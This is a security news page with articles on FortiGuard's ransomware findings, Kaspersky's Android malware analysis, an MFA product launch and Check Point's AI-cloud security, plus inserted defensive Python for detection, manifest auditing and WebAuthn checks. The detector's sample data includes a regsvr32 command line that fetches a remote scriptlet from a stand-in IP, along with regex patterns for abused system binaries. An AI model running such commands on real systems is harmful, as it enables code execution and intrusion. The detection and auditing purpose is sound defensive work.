
Cyber Security

FortiGuard Labs Reports Ransomware Variants Almost Double in Six Months

Fortinet has announced the latest semiannual FortiGuard Labs Global Threat Landscape Report. “Cyber adversaries are advancing their playbooks to thwart defense and scale their criminal affiliate networks,” says Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs. “They are using aggressive execution strategies such as extortion or wiping data as well as focusing on reconnaissance tactics pre-attack to ensure better return on threat investment. To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”

Highlights of the 1H 2022 report follow:

  • The ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS).
  • Work-from-anywhere (WFA) endpoints remain targets for cyber adversaries to gain access to corporate networks. Operational technology (OT) and information technology (IT) environments are both attractive targets as cyber adversaries search for opportunities in the growing attack surface and IT/OT convergence.
  • Destructive threat trends continue to evolve, as evidenced by the spread of wiper malware as part of adversary toolkits.
  • Cyber adversaries are embracing more reconnaissance and defense evasion techniques to increase precision and destructive weaponization across the cyber-attack chain.

Ransomware Variant Growth Shows Evolution of Crime Ecosystems: Ransomware remains a top threat and cyber adversaries continue to invest significant resources into new attack techniques. In the past six months, FortiGuard Labs has seen a total of 10,666 ransomware variants, compared to just 5,400 in the previous six-month period. That is nearly 100% growth in ransomware variants in half a year. RaaS, with its popularity on the dark web, continues to fuel an industry of criminals forcing organizations to consider ransomware settlements. To protect against ransomware, organizations, regardless of industry or size, need a proactive approach. Real-time visibility, protection, and remediation coupled with zero-trust network access (ZTNA) and advanced endpoint detection and response (EDR) are critical.

Exploit Trends Show OT and the Endpoint Are Still Irresistible Targets: The digital convergence of IT and OT, and the endpoints enabling WFA, remain key attack vectors as adversaries continue to target the growing attack surface. Many exploits of endpoint vulnerabilities involve unauthorized users gaining access to a system with the goal of moving laterally deeper into corporate networks. For example, a spoofing vulnerability (CVE-2022-26925) placed high in volume, as did a remote code execution (RCE) vulnerability (CVE-2022-26937). Analyzing endpoint vulnerabilities by volume and detections also reveals the relentless path of cyber adversaries attempting to gain access by exploiting both old and new vulnerabilities. OT vulnerability trends show that the sector was not spared: a wide range of devices and platforms experienced in-the-wild exploits, demonstrating the cybersecurity reality of increased IT and OT convergence and the disruptive goals of adversaries. Advanced endpoint technology can help mitigate and remediate infected devices at an early stage of an attack. In addition, services such as a digital risk protection service (DRPS) can be used to perform external attack surface assessments, find and remediate security issues, and gain contextual insight into current and imminent threats.

Destructive Threat Trends Continue With Wipers Widening: Wiper malware trends reveal a disturbing evolution of more destructive and sophisticated attack techniques continuing with malicious software that destroys data by wiping it clean. The war in Ukraine fueled a substantial increase in disk wiping malware among threat actors primarily targeting critical infrastructure. FortiGuard Labs identified at least seven major new wiper variants in the first six months of 2022 that were used in various campaigns against government, military, and private organizations. This number is significant because it is close to the number of wiper variants that have been publicly detected since 2012. Additionally, the wipers did not stay in one geographical location but were detected in 24 countries besides Ukraine. To minimize the impact of wiper attacks, network detection and response (NDR) with self-learning artificial intelligence (AI) is helpful to better detect intrusions. Also, backups must be stored offsite and offline.

Defense Evasion Remains Top Attack Tactic Globally: Examining adversarial strategies reveals how attack techniques and tactics are evolving. FortiGuard Labs analyzed the functionality of detected malware to track the most prevalent approaches over the last six months. Among the top eight tactics and techniques focused on the endpoint, defense evasion was the tactic most employed by malware developers, most often through system binary proxy execution. Hiding malicious intent is one of the most important things for adversaries, so they attempt to evade defenses by masking their activity, for example by hiding commands behind a trusted process executed under a legitimate certificate so that the trusted process carries out the malicious action. The second most popular technique was process injection, where criminals inject code into the address space of another process to evade defenses and improve stealth. Armed with this actionable intelligence, organizations will be better positioned to defend against the broad toolkits of adversaries. Integrated, AI- and ML-driven cybersecurity platforms with advanced detection and response capabilities, powered by actionable threat intelligence, are important to protect across all edges of hybrid networks.
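The two techniques named above correspond to MITRE ATT&CK T1218 (System Binary Proxy Execution) and T1055 (Process Injection). Both are visible in endpoint telemetry precisely because the signed binary itself is legitimate: the signal is in the command line, the parent process, or the access rights requested on another process, not in the image. The following Python is an added example, not FortiGuard Labs tooling. It runs two simple rules over constructed Sysmon-style events (process creation and process access); every path, filename and IP address in the sample data is made up.

```python
"""Detection rules for the two defense-evasion techniques named above:
system binary proxy execution (ATT&CK T1218) and process injection (T1055).
EVENTS holds constructed samples shaped like Sysmon Event ID 1 (process
create) and Event ID 10 (process access); nothing here is report data."""
import re
from typing import Dict, List

# Signed Windows binaries that will run attacker-supplied code ("LOLBins").
# Because the image is signed by Microsoft, signature-based allowlisting
# passes it; the command line is where the abusive pattern shows.
PROXY_BINARY_RULES = {
    "rundll32.exe": re.compile(r"\\(users|programdata|temp)\\", re.I),  # DLL loaded from a user-writable path
    "regsvr32.exe": re.compile(r"/i:\s*https?://|scrobj\.dll", re.I),   # remote scriptlet via scrobj.dll
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),  # HTA from a URL or inline script
    "msiexec.exe": re.compile(r"https?://", re.I),                       # installer package fetched over HTTP
}

# Handle rights a process needs on another process to write code into it and
# start a thread there: PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
# PROCESS_VM_WRITE. Query-only rights (e.g. 0x1000) never trip the rule.
INJECTION_RIGHTS = 0x0002 | 0x0008 | 0x0020


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Return one finding per matching event, tagged with its ATT&CK technique."""
    findings: List[Dict] = []
    for ev in events:
        if ev["event_id"] == 1:
            image = _basename(ev["image"])
            rule = PROXY_BINARY_RULES.get(image)
            if rule and rule.search(ev["command_line"]):
                findings.append({"technique": "T1218", "image": image,
                                 "related": _basename(ev["parent_image"]),
                                 "detail": ev["command_line"]})
        elif ev["event_id"] == 10:
            granted = int(ev["granted_access"], 16)
            source = ev["source_image"].lower()
            # A path allowlist is a weak signal (attackers can write under
            # C:\Windows\Temp); production rules should check the signer too.
            from_system_dir = source.startswith("c:\\windows\\system32\\")
            if granted & INJECTION_RIGHTS == INJECTION_RIGHTS and not from_system_dir:
                findings.append({"technique": "T1055", "image": _basename(source),
                                 "related": _basename(ev["target_image"]),
                                 "detail": f"granted_access={ev['granted_access']}"})
    return findings


# Constructed sample telemetry: three benign events and three that should match.
EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},                    # routine use
    {"event_id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"rundll32.exe C:\Users\Public\update.dll,Start"},              # DLL in a public dir
    {"event_id": 1, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"regsvr32 /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"},  # Office spawning regsvr32
    {"event_id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},               # local HTA, no URL
    {"event_id": 10, "source_image": r"C:\Users\alice\AppData\Local\Temp\inv.exe",
     "target_image": r"C:\Windows\explorer.exe", "granted_access": "0x1F0FFF"},       # full access from Temp
    {"event_id": 10, "source_image": r"C:\Windows\System32\svchost.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1000"},   # query-only
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['technique']} {f['image']} ({f['related']}): {f['detail']}")
```

Run as a script it prints the three findings (two T1218, one T1055). In production the same rules would be expressed in the SIEM or EDR query language, with the signer of the source process checked rather than its path.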

AI-powered Security Across the Extended Attack Surface
When organizations gain a deeper understanding of the goals and tactics used by adversaries through actionable threat intelligence, they can better align defenses to adapt and react to quickly changing attack techniques proactively. Threat insights are critical to help prioritize patching strategies to better secure environments. Cybersecurity awareness and training are also important as the threat landscape changes to keep employees and security teams up-to-date. Organizations need security operations that can function at machine speed to keep up with the volume, sophistication, and rate of today’s cyber threats. AI and ML-powered prevention, detection, and response strategies based on a cybersecurity mesh architecture allow for much tighter integration, increased automation, as well as a more rapid, coordinated, and effective response to threats across the extended network.

Report Overview
This latest Global Threat Landscape Report is a view representing the collective intelligence of FortiGuard Labs, drawn from Fortinet’s vast array of sensors collecting billions of threat events observed around the world during the first half of 2022. Similar to how the MITRE ATT&CK framework classifies adversary tactics and techniques, with the first three groupings spanning reconnaissance, resource development, and initial access, the FortiGuard Labs Global Threat Landscape Report leverages this model to describe how threat actors target vulnerabilities, build malicious infrastructure, and exploit their targets. The report also covers global and regional perspectives as well as threat trends affecting IT and OT.

Cyber Security

Kaspersky Warns of Android Malware Exhibiting Diverse Features

Three new dangerous Android malware variants have been analyzed by Kaspersky researchers. The Tambir, Dwphon, and Gigabud malicious programs exhibit diverse features, ranging from downloading other programs and credential theft to bypassing two-factor authentication and screen recording, jeopardizing user privacy and security.

In 2023, Kaspersky solutions blocked nearly 33.8 million attacks on mobile devices from malware, adware, and riskware, a 50% global increase over the previous year’s figures. Android malware and riskware activity surged in 2023 after two years of relative calm, returning to early-2021 levels by the end of the year. That said, the number of unique installation packages dropped from 2022, suggesting that malicious actors were more frequently reusing the same packages to infect different victims: last year Kaspersky detected more than 1.3 million unique malicious installation packages targeting the Android platform, distributed in various ways. Among these were the Tambir, Dwphon and Gigabud malicious programs, whose diverse features are described below.

Tambir is a spyware application disguised as an IPTV app. It collects sensitive user information, such as SMS messages and keystrokes, after obtaining the appropriate permissions. The malware supports over 30 commands retrieved from its Command and Control server and has been compared to the GodFather malware, both targeting users mainly in Turkey, though several other countries were also affected.

Gigabud, active since mid-2022, was initially focused on stealing banking credentials from users in Southeast Asia, but later crossed borders into other countries and regions. It has since evolved into fake loan malware and is capable of screen recording and mimicking tapping by users to bypass two-factor authentication.

Dwphon, discovered in November 2023, targets cell phones from Chinese OEM manufacturers, primarily in the Russian market. The same malware had earlier been found in the firmware of a kids’ smartwatch by an Israeli manufacturer, distributed mainly in Europe and the Middle East. Dwphon is distributed as a component of a system update application and collects information about the device as well as personal data. It also gathers information about installed third-party applications and is capable of downloading, installing and deleting other applications on the device. One of the analyzed samples also included the Triada trojan, one of the most widespread mobile trojans of 2023, which suggests that Dwphon modules are Triada-related.

“As Kaspersky’s mobile threats report shows, Android malware and riskware activity surged in 2023 after two years of relative calm, returning to levels seen in 2021 by the end of the year. Users should exercise caution and should avoid downloading apps from unofficial sources, meticulously reviewing app permissions. Frequently, these apps lack exploitation functionality and depend solely on permissions granted by the user. Furthermore, using anti-malware tools can help preserve the integrity of your Android device,” comments Jornt van der Wiel, senior security researcher at Kaspersky’s GReAT.
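The point in the closing quote, that these families rely on permissions the user grants rather than on exploits, is something a reviewer can check directly in an app's manifest. The Python below is an added example, not Kaspersky tooling: it audits a decoded AndroidManifest.xml for the capabilities the three families depend on (SMS access as with Tambir, an accessibility service that can read the screen and inject taps as with Gigabud, and the right to install further packages as with Dwphon). The manifest it parses is constructed and the "IPTV Player" it describes is fictional; real APKs carry a binary manifest, so in practice this runs on the output of a decoder such as apktool or aapt2.

```python
"""Audit a decoded AndroidManifest.xml for the permission set the article's
malware families depend on. Added example; the manifests are constructed."""
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Real Android permissions, annotated with the abuse the article describes.
HIGH_RISK_PERMISSIONS: Dict[str, str] = {
    "android.permission.READ_SMS": "read stored SMS, including one-time codes",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS (2FA bypass)",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw over other apps (overlay phishing)",
    "android.permission.REQUEST_INSTALL_PACKAGES": "install further APKs (dropper)",
    "android.permission.READ_PHONE_STATE": "read device identifiers for profiling",
}

# An accessibility service is a <service> guarded by this permission; it is
# what lets malware read the screen and perform taps on the user's behalf.
ACCESSIBILITY_BIND = "android.permission.BIND_ACCESSIBILITY_SERVICE"


def audit_manifest(manifest_xml: str) -> Dict:
    """Return the package name and every high-risk permission or service found."""
    root = ET.fromstring(manifest_xml)
    findings: List[Dict[str, str]] = []
    for perm in root.iter("uses-permission"):
        name = perm.get(ANDROID_NS + "name", "")
        if name in HIGH_RISK_PERMISSIONS:
            findings.append({"item": name, "reason": HIGH_RISK_PERMISSIONS[name]})
    for svc in root.iter("service"):
        if svc.get(ANDROID_NS + "permission") == ACCESSIBILITY_BIND:
            findings.append({"item": svc.get(ANDROID_NS + "name", "?"),
                             "reason": "accessibility service: screen reading and synthetic taps"})
    return {"package": root.get("package"), "findings": findings}


# Constructed manifest of a fictional "IPTV Player" asking for far more than
# video playback needs. Nothing here is taken from a real sample.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.iptvplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application android:label="IPTV Player">
    <service android:name=".helper.AccService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Constructed manifest of a plain note-taking app for comparison.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>"""

if __name__ == "__main__":
    for manifest in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        report = audit_manifest(manifest)
        print(report["package"], f"{len(report['findings'])} high-risk item(s)")
        for f in report["findings"]:
            print("  ", f["item"], "->", f["reason"])
```

The useful judgement is the mismatch between an app's stated purpose and what it asks for: a video player has no reason to read SMS or install packages, which is exactly the review the quote asks users to perform before accepting permission prompts.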

Cyber Security

Intercede Intros MyID MFA v5

Intercede has announced the launch of MyID MFA (Multi-Factor Authentication) 5.0. The latest addition to the MyID product family raises the security bar by enabling organizations to protect on-premise and cloud-based applications, as well as the Windows desktop logon (online and offline), with a range of phishing-resistant MFA options including OTP (one-time passwords), mobile apps, syncable FIDO passkeys and biometric-protected hardware devices.

Bringing enterprise-managed FIDO passkeys into MyID MFA makes it easy to FIDO-enable multiple applications and deploy passkeys to end users, enhancing security and improving the user experience. MyID MFA acts as both a FIDO authentication server and a passkey issuance solution. End users authenticate to MyID MFA with their passkey, and by support for standard federated identity protocols, MyID MFA provides authentication services to multiple applications including cloud, on-premise and Windows desktop logon.

Organizations can choose syncable passkeys, which use the FIDO protocol built into mobile devices and web browsers to deliver a simple, secure and passwordless authentication process via fingerprint, face ID or PIN. For organizations requiring higher levels of security and control, MyID MFA supports device-bound passkeys, such as the YubiKey and the YubiKey Bio, which deliver a similarly seamless authentication experience while ensuring the highest level of security.
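What makes the passkeys described here phishing-resistant is not the fingerprint or PIN but the binding to the site: the browser writes the page origin into clientDataJSON, the authenticator signs over sha256(clientDataJSON) together with authenticatorData (which carries a hash of the relying-party ID), and the browser will not even offer a credential to a page whose origin does not match that RP ID. The Python below is an added example, not Intercede's code, showing the relying-party checks that a FIDO authentication server performs on an assertion before verifying the signature. The RP ID, origin and sample assertion are constructed; the final signature check against the credential's registered public key needs a crypto library and is left outside the block.

```python
"""Relying-party checks on a WebAuthn/FIDO2 assertion. Added example; the
RP ID, origin and the client/authenticator data built here are constructed."""
import base64
import hashlib
import json
import secrets
import struct

EXPECTED_ORIGIN = "https://login.example.com"   # constructed
EXPECTED_RP_ID = "login.example.com"            # constructed

FLAG_UP = 0x01  # user present
FLAG_UV = 0x04  # user verified (PIN or biometric checked by the authenticator)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def new_challenge() -> bytes:
    """Fresh random challenge per login attempt, kept server-side until consumed."""
    return secrets.token_bytes(32)


# --- client side, modelled so the block runs offline ---------------------------

def make_client_data(challenge: bytes, origin: str) -> bytes:
    """The browser builds this; a page on a look-alike domain gets that domain's origin."""
    return json.dumps({"type": "webauthn.get",
                       "challenge": b64url_encode(challenge),
                       "origin": origin}).encode()


def make_authenticator_data(rp_id: str, flags: int, sign_count: int) -> bytes:
    """rpIdHash (32 bytes) || flags (1 byte) || signCount (4 bytes, big-endian)."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + struct.pack(">I", sign_count)


# --- relying-party side ---------------------------------------------------------

def verify_client_data(client_data_json: bytes, expected_challenge: bytes) -> bytes:
    """Check type, challenge and origin; return the hash the signature covers."""
    cd = json.loads(client_data_json)
    if cd.get("type") != "webauthn.get":
        raise ValueError("type mismatch: not an authentication ceremony")
    if not secrets.compare_digest(b64url_decode(cd.get("challenge", "")), expected_challenge):
        raise ValueError("challenge mismatch: replayed or from another session")
    if cd.get("origin") != EXPECTED_ORIGIN:
        raise ValueError(f"origin mismatch: {cd.get('origin')!r}")
    return hashlib.sha256(client_data_json).digest()


def verify_authenticator_data(auth_data: bytes, last_sign_count: int) -> int:
    """Check rpIdHash, presence/verification flags and the signature counter."""
    if len(auth_data) < 37:
        raise ValueError("authenticatorData too short")
    if auth_data[:32] != hashlib.sha256(EXPECTED_RP_ID.encode()).digest():
        raise ValueError("rpIdHash mismatch")
    flags = auth_data[32]
    if not flags & FLAG_UP:
        raise ValueError("user not present")
    if not flags & FLAG_UV:
        raise ValueError("user verification required for this RP")
    sign_count = struct.unpack(">I", auth_data[33:37])[0]
    # A counter that fails to advance can mean a cloned authenticator. Synced
    # passkeys commonly report 0 throughout, so only enforce when non-zero.
    if sign_count != 0 and sign_count <= last_sign_count:
        raise ValueError("signCount did not increase (possible cloned credential)")
    return sign_count


def check_assertion(client_data_json: bytes, auth_data: bytes,
                    expected_challenge: bytes, last_sign_count: int = 0) -> str:
    """Return 'ok' when the pre-signature checks pass, else the reason for rejection."""
    try:
        client_hash = verify_client_data(client_data_json, expected_challenge)
        verify_authenticator_data(auth_data, last_sign_count)
    except ValueError as exc:
        return str(exc)
    # The credential's stored public key must verify the signature over exactly
    # these bytes; that step needs a crypto library and is omitted here.
    _signed_bytes = auth_data + client_hash
    return "ok"


if __name__ == "__main__":
    challenge = new_challenge()
    auth = make_authenticator_data(EXPECTED_RP_ID, FLAG_UP | FLAG_UV, 7)
    print(check_assertion(make_client_data(challenge, EXPECTED_ORIGIN), auth, challenge))
    print(check_assertion(make_client_data(challenge, "https://login.example-com.net"), auth, challenge))
```

The second call models what a proxy-phishing site would hand to the genuine service if it could obtain an assertion at all: the origin field names the attacker's domain, so the check fails before any signature is examined. This is the property that OTP codes typed into a web form do not have, since a code carries no information about where it was entered.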

MyID MFA also enables the federation of applications (the ability to share identity and authentication information between systems in a managed way), be they cloud-based or on-premise, with support for standards-based protocols such as OpenID Connect and SAML. With federated identity provider (IDP) capabilities built into MyID MFA, it is a natural successor to Microsoft ADFS (Active Directory Federation Services). In addition to acting as an IDP, MyID MFA enables federations with an organisation’s existing credentials and identity providers, including Google and Microsoft Authenticator apps. This allows users to use the apps they are already familiar with and enables organisations to use credentials that are already deployed, reducing operational costs and speeding up the time to deployment.

MyID MFA supports the delivery of a unified authentication experience across the entire application suite, including authentication to applications, accessing self-service portals (to reset credentials), as well as logging on to the Windows desktop. The Windows Desktop Agent has been enhanced in v5.0 with added support for federation, the inclusion of third-party authenticators and FIDO passkeys, meaning organizations have a wider choice than ever on how to protect the primary gateway to their data, networks and applications, regardless of whether they are on Windows 11 or Windows 10 devices.

Allen Storey, Chief Product Officer at Intercede, states: “It is our mission to help organizations protect themselves against data breach by deploying stronger authentication simply, securely and at scale, whether they are SMBs with hundreds of users, larger enterprises, or federal authorities with thousands of users. MyID MFA is the simplest way for any organization to protect their applications, data and networks against cyber-attacks, with phishing-resistant authentication that is easy to deploy, manage and use.”

MyID MFA is part of the MyID product family that includes MyID PSM (Password Security Management) and MyID CMS (Credential Management System), which enables organisations to choose the level of security that best fits their needs, from passwords to one-time codes, mobile apps, FIDO passkeys and public key infrastructure (PKI).

Artificial Intelligence

Check Point to Secure AI Cloud Infrastructure with NVIDIA

Check Point Software Technologies has announced it is collaborating with NVIDIA to enhance the security of AI cloud infrastructure. Integrating with NVIDIA DPUs, the new Check Point AI Cloud Protect solution will help prevent threats at both the network and host levels.

“AI provides great benefits across healthcare, education, finance and more. At the same time, the rate and sophistication of cyber attacks are increasing, with threat actors increasingly looking at ways to disrupt AI workloads in the cloud,” said Gera Dorfman, Vice President of Network Security at Check Point Software Technologies. “We are working with NVIDIA to deliver a new secure AI cloud solution with Check Point AI Cloud Protect that guards even the most sensitive and private AI workloads against cyber threats.”

The rapid proliferation of AI has brought about a revolution in workplace efficiency and innovation. However, this growth also creates additional attack vectors specifically targeting AI, such as backdooring AI models to control a model’s output or to gain unauthorized access to the environment, data exfiltration to expose intellectual property, and denial of service to degrade performance and reduce capacity.

These threats compromise the integrity and security of AI systems and pose risks to business outcomes. They can also erode the foundational trust in AI operations, while potentially affecting other aspects of the data center. There is a critical need for a revamped security approach to protect not only the data in its traditional form but also the AI models themselves, which are central to innovation and competitive edge.

Check Point aims to address these challenges with NVIDIA by integrating network and host-level security insights, offering a comprehensive solution that protects AI infrastructures from both conventional and novel cyber threats. This integrated approach helps ensure the security system is cognizant of network activities and host-level processes, which is crucial for safeguarding AI’s future.

“As AI becomes more pervasive, securing AI clouds becomes paramount,” said Yael Shenhav, Vice President of Networking Products at NVIDIA. “NVIDIA BlueField 3 enables innovators such as Check Point to offer robust cyber defence measures to secure AI cloud data centres, while also ensuring peak AI performance.”

In response to these emerging challenges, AI Cloud Protect is positioned as a strategic solution addressing the dynamic security requirements of the AI era. Designed for easy deployment, adaptability and scalability, it offers out-of-the-box security without impacting AI performance and provides a robust shield against sophisticated cyber threats.

Engineered with the NVIDIA BlueField 3 DPU, which powers a new class of AI cloud data centres, and the NVIDIA DOCA software framework, AI Cloud Protect is designed to seamlessly integrate into NVIDIA’s AI ecosystems, providing:

  • Robust Defense Against AI-Specific Threats: Empowers organizations to efficiently shield against model inversion, model theft and other attack vectors with unprecedented efficiency.
  • Scalable, Seamless Integration: Facilitates easy deployment across diverse AI environments, ensuring security measures grow in tandem with organizational needs.
  • Optimized Performance with Zero Compromise: Ensures AI operations continue unhindered, with security processes running discreetly, leveraging NVIDIA’s technological infrastructure without impacting AI performance.

Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.